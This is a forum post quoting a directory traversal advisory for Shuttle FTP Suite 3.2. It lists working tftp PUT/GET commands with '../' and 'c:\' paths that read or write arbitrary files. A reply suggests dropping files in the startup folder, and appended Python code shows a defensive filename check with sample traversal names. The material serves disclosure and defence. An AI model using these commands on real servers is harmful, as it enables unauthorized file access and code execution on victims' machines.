
qcred11
QUOTE


Application: Shuttle FTP Suite
Web Site:    http://www.waveflow.com/shuttleftp/
Versions:    3.2
Platform:    Windows
Bug:         Directory Traversal


1) Introduction
2) Bug
3) The Code
4) The Fix


===============
1) Introduction
===============

Shuttle FTP Suite is the only Internet Suite that includes all these applications in one program.
It also has a very visual interface (similar to Windows Explorer) that makes it very easy to use.

======
2) Bug
======

A remote user can traverse the directory and retrieve and/or write files on the system.


===========
3) The Code
===========

tftp -i [Server_IP] PUT [FileName] ../[FileName]

tftp -i [Server_IP] PUT [FileName] c:\[FileName]


tftp -i [Server_IP] GET ../[FileName]

tftp -i [Server_IP] GET c:\[FileName]


===========
4) The Fix
===========

Date of Vendor Notification:

02-08-04

Status:

No Response

Paul
Hm, it could be hackable if ya place files in the startup folder/file.
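
Added example, not part of the thread and not the vendor's code: the advisory lists no fix, so this sketches the filename check a TFTP server needs in order to refuse the `../` and `c:\` requests shown in section 3. The root `C:\tftproot`, the function names and the sample filenames are assumptions constructed for illustration; the check is lexical only and does not resolve links or junctions.

```python
import ntpath  # Windows path rules, importable on any OS

TFTP_ROOT = r"C:\tftproot"  # assumed root, not a path from the advisory


class TraversalError(ValueError):
    """Requested filename would resolve outside the TFTP root."""


def resolve_request(filename, root=TFTP_ROOT):
    """Map a client-supplied filename to a path under root, or raise."""
    if not filename or "\x00" in filename:
        raise TraversalError("empty name or embedded NUL")
    # Clients may send either separator; treat both as Windows would.
    name = filename.replace("/", "\\")
    drive, rest = ntpath.splitdrive(name)
    if drive or ":" in rest:
        raise TraversalError("drive, UNC or stream syntax not allowed")
    if rest.startswith("\\"):
        raise TraversalError("rooted path not allowed")
    # Collapse "." and "..", then confirm the result is still under root.
    root_norm = ntpath.normcase(ntpath.normpath(root))
    candidate = ntpath.normpath(ntpath.join(root, rest))
    cand_norm = ntpath.normcase(candidate)
    if not cand_norm.startswith(root_norm + "\\"):
        raise TraversalError("path escapes the TFTP root")
    return candidate


def audit(requests, root=TFTP_ROOT):
    """Return {filename: resolved path, or None if the request is refused}."""
    results = {}
    for name in requests:
        try:
            results[name] = resolve_request(name, root)
        except TraversalError:
            results[name] = None
    return results


# Constructed sample requests mirroring the advisory's PUT/GET patterns.
SAMPLE_REQUESTS = ["images/fw.bin", "../boot.ini", "c:\\boot.ini",
                   "sub/../../boot.ini", "\\\\host\\share\\x", "."]

if __name__ == "__main__":
    for name, path in audit(SAMPLE_REQUESTS).items():
        print(f"{name!r:28} -> {path or 'REFUSED'}")
```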